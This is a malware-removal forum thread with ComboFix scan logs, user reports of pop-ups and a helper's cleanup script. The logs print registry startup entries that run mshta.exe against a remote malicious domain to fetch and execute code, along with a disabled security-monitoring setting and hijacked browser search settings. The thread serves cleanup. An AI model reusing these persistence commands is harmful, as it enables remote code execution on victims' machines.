[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
mshta [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20	3305760	----a-w-	c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28	59240	----a-w-	c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40	413696	----a-w-	c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39	16040	----a-w-	c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39	672424	----a-w-	c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00	188928	----a-w-	c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22	3739648	----a-w-	c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49	55416	----a-w-	c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09	421736	----a-w-	c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14	34352	----a-w-	c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08	1062184	----a-w-	c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22	2785608	----a-w-	c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28	421888	----a-w-	c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11	4489216	----a-w-	c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39	1826816	----a-w-	c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46	448632	----a-w-	c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33	49664	----a-w-	c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35	90112	----a-w-	c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42	438272	----a-w-	c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36	1451304	----a-w-	c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39	411192	----a-w-	c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11	2648184	----a-w-	c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
MSConfigStartUp-NDSTray - NDSTray.exe
MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-28 22:49
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2012-05-28 22:55:51
ComboFix-quarantined-files.txt 2012-05-29 02:55
.
Pre-Run: 28,398,157,824 bytes free
Post-Run: 28,481,286,144 bytes free
.
- - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF


----------



## gagraptor (May 23, 2012)

torrents not in use


----------



## gagraptor (May 23, 2012)

the problem seems partially solved. now i have blank windows popping up. it has a web address in the top. Http://silentmode.net/reg2php?cccid=irfzxjvu2w6rbs0ht6u6qncccsjqkmcp


----------



## gagraptor (May 23, 2012)

i guess its not its back again


----------



## Mark1956 (May 7, 2011)

No surprise with that, I was not sure if Combofix would clear the problem but it has given more information to work from, this fix should clear it. There will be a few more things to do once the problem of the popups has gone so please stick with me until I say we are done.

We are now going to run ComboFix a different way.
Open Notepad by clicking on







and in the *Search* box type: *Notepad.exe* and hit *Enter*.
Copy and paste everything in the *code box* below into it.
_-- Note: Make sure Word Wrap is *unchecked* in Notepad by clicking on *Format* in the top menu._

```
Killall::
Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
Reboot::
```

Save the file as *CFScript.txt* by choosing _Save As..._ in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
Close your browser and* disconnect* from the Internet.
Now use your mouse to *drag*, then *drop* the CFScript.txt file on top of ComboFix.exe as seen in the image below.








This will start ComboFix again and launch the script.
ComboFix may reboot your system when it finishes. This is normal.
A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of *ComboFix.txt* in your next reply.
Be sure to *re-enable* your anti-virus and other security programs *after* the scan is complete.


----------



## gagraptor (May 23, 2012)

ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
.
.
2012-05-30 04:03 . 2012-05-30 04:05	--------	d-----w-	c:\users\GAGAN\AppData\Local\temp
2012-05-30 04:03 . 2012-05-30 04:03	--------	d-----w-	c:\users\Default\AppData\Local\temp
2012-05-30 03:44 . 2012-05-30 03:44	29904	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
2012-05-29 18:04 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
2012-05-29 03:00 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-09 04:58 . 2012-05-09 04:58	592824	----a-w-	c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58	44472	----a-w-	c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-04-02 13:36 . 2012-05-14 22:56	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
